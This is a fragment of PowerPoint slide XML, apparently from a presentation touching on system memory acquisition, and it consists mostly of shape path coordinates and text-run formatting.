            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cookies 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endParaRPr sz="2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44388" y="306451"/>
            <a:ext cx="496824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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="204">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition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07991" y="760476"/>
            <a:ext cx="7164323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208095" y="4735067"/>
            <a:ext cx="5749290" cy="3534410"/>
            <a:chOff x="5208095" y="4735067"/>
            <a:chExt cx="5749290" cy="3534410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5208095" y="5050821"/>
              <a:ext cx="5749290" cy="3218180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5749290" h="3218179">
                  <a:moveTo>
                    <a:pt x="2873676" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2845300" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832401" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2832401" y="1860899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2781332" y="1861240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730449" y="1862264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2679753" y="1863970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629243" y="1866360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578921" y="1869432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2528786" y="1873187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2478838" y="1877625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429077" y="1882746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379503" y="1888551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330117" y="1895038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2280918" y="1902209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231907" y="1910064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183083" y="1918602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134447" y="1927823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085998" y="1937728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037738" y="1948317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989665" y="1959590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941781" y="1971546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894084" y="1984187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1846576" y="1997512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1799256" y="2011521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738679" y="1107789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726156" y="1100716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711073" y="1098359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696013" y="1100716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683561" y="1107789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675846" y="1126378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673274" y="1143825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675846" y="1158938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683561" y="1170527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716579" y="2036540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667346" y="2051576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618414" y="2067280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569788" y="2083646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1521475" y="2100672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1473481" y="2118351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425811" y="2136681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378472" y="2155656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331470" y="2175273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284810" y="2195526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238499" y="2216412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192542" y="2237926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146947" y="2260063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101718" y="2282820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056862" y="2306193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012384" y="2330175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968291" y="2354764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924589" y="2379955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881283" y="2405744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838381" y="2432125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795887" y="2459096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753807" y="2486651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712149" y="2514786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670917" y="2543497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630118" y="2572779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589757" y="2602628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549841" y="2633040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510376" y="2664009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471368" y="2695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432823" y="2727607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394746" y="2760225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357144" y="2793384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320023" y="2827080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283388" y="2861308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247247" y="2896063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211604" y="2931342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176465" y="2967139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141838" y="3003452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107727" y="3040274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74140" y="3077602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41080" y="3115432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8556" y="3153759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3188271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6681" y="3199647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22399" y="3203962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34851" y="3216321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49911" y="3218087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64994" y="3212792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77517" y="3203962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108780" y="3166555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140581" y="3129648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172913" y="3093243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205769" y="3057342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239141" y="3021950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273024" y="2987069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307410" y="2952701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342292" y="2918849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377663" y="2885517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413517" y="2852708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449846" y="2820423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486643" y="2788667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523902" y="2757441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561616" y="2726749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599777" y="2696594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638379" y="2666978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677415" y="2637904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716877" y="2609376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756760" y="2581396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797055" y="2553967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837757" y="2527092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878857" y="2500774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920350" y="2475015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962228" y="2449819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004485" y="2425188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047112" y="2401125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090105" y="2377634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133454" y="2354716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177155" y="2332375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221199" y="2310615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265580" y="2289436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310290" y="2268843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355324" y="2248839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400673" y="2229426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446331" y="2210607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492292" y="2192384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538547" y="2174762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585091" y="2157743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631916" y="2141329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679016" y="2125523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726382" y="2110329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774010" y="2095749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821890" y="2081787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870018" y="2068444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1918385" y="2055724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1966985" y="2043630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015810" y="2032164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064855" y="2021330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114111" y="2011130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163573" y="2001568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213232" y="1992645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2263083" y="1984366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2313118" y="1976732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2363330" y="1969747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413712" y="1963414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464258" y="1957735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514961" y="1952714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2565812" y="1948352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2616807" y="1944654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667937" y="1941622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719196" y="1939258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770577" y="1937567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822073" y="1936549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873676" y="1936210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925100" y="1936539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976382" y="1937525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027517" y="1939165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078498" y="1941457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3129320" y="1944397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179979" y="1947983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3230468" y="1952212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3280782" y="1957082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330917" y="1962589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3380865" y="1968730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3430623" y="1975504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480184" y="1982908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3529543" y="1990938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3578695" y="1999592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627634" y="2008867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3676355" y="2018760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3724852" y="2029270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3773121" y="2040392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821155" y="2052124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3868949" y="2064464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3916498" y="2077408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963796" y="2090954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010839" y="2105100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057620" y="2119842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4104134" y="2135178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150376" y="2151104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196340" y="2167619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242021" y="2184720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287413" y="2202403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332511" y="2220666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4377310" y="2239506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4421805" y="2258921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4465989" y="2278908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509857" y="2299464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4553405" y="2320586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4596626" y="2342271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639515" y="2364518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4682066" y="2387322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4724275" y="2410682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4766136" y="2434594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4807644" y="2459056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4848792" y="2484065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4889576" y="2509619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929991" y="2535714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4970030" y="2562348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5009688" y="2589518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5048961" y="2617222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5087842" y="2645456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5126326" y="2674218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5164408" y="2703505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5202082" y="2733314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5239343" y="2763643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5276185" y="2794489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5312604" y="2825850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5348593" y="2857721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5384147" y="2890102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5419262" y="2922988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5453930" y="2956377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5488148" y="2990267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5521909" y="3024655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5555208" y="3059537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5588040" y="3094912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5620399" y="3130776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5652280" y="3167127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5683678" y="3203962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5686038" y="3211223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5692267" y="3214952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701091" y="3216326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5711237" y="3216522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5713597" y="3216326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5719825" y="3214952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5728650" y="3211223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5738796" y="3203962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5746511" y="3199647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5749083" y="3188271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5746511" y="3172190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5738796" y="3153759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5706736" y="3115404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5674140" y="3077595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5641014" y="3040335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5607366" y="3003623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5573202" y="2967461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5538529" y="2931850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5503355" y="2896792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5467686" y="2862288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5431529" y="2828339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5394892" y="2794947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5357780" y="2762112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5320203" y="2729836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282165" y="2698120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5243675" y="2666966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5204739" y="2636375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5165364" y="2606347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5125558" y="2576884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5085327" y="2547989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5044678" y="2519660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5003618" y="2491901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4962154" y="2464712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4920294" y="2438095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4878044" y="2412050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4835411" y="2386579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792402" y="2361684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4749024" y="2337365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4705284" y="2313624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661190" y="2290462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616747" y="2267880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571964" y="2245880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4526847" y="2224463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4481402" y="2203630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4435638" y="2183382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4389561" y="2163721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4343178" y="2144648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296496" y="2126164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4249521" y="2108270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4202262" y="2090968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4154725" y="2074259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5187743" y="1170527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5195530" y="1153634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198125" y="1139110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5195530" y="1124610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5187743" y="1107789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5169237" y="1100716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5153326" y="1098359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5137415" y="1100716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5118909" y="1107789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4072048" y="2049113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4025104" y="2033102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3977711" y="2017803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3929891" y="2003216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881664" y="1989340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3833049" y="1976175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3784068" y="1963723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3734741" y="1951982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685088" y="1940952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3635128" y="1930634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3584884" y="1921028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534374" y="1912133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483619" y="1903950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3432639" y="1896478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381455" y="1889718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330087" y="1883669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278555" y="1878333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3226880" y="1873707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175081" y="1869794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123180" y="1866591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3071196" y="1864101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019150" y="1862322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967061" y="1861255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914951" y="1860899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914951" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2902053" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873676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503164" y="4735067"/>
              <a:ext cx="5156200" cy="1858010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5156200" h="1858009">
                  <a:moveTo>
                    <a:pt x="743712" y="1383030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1336103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1290916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1247813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1207147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1169289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1134554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1103325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1075931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1052728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1034084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1020318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1011809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1008888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1011809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1020318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1034084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1052728"/>
                  </a:lnTo>
                  <a:lnTo>
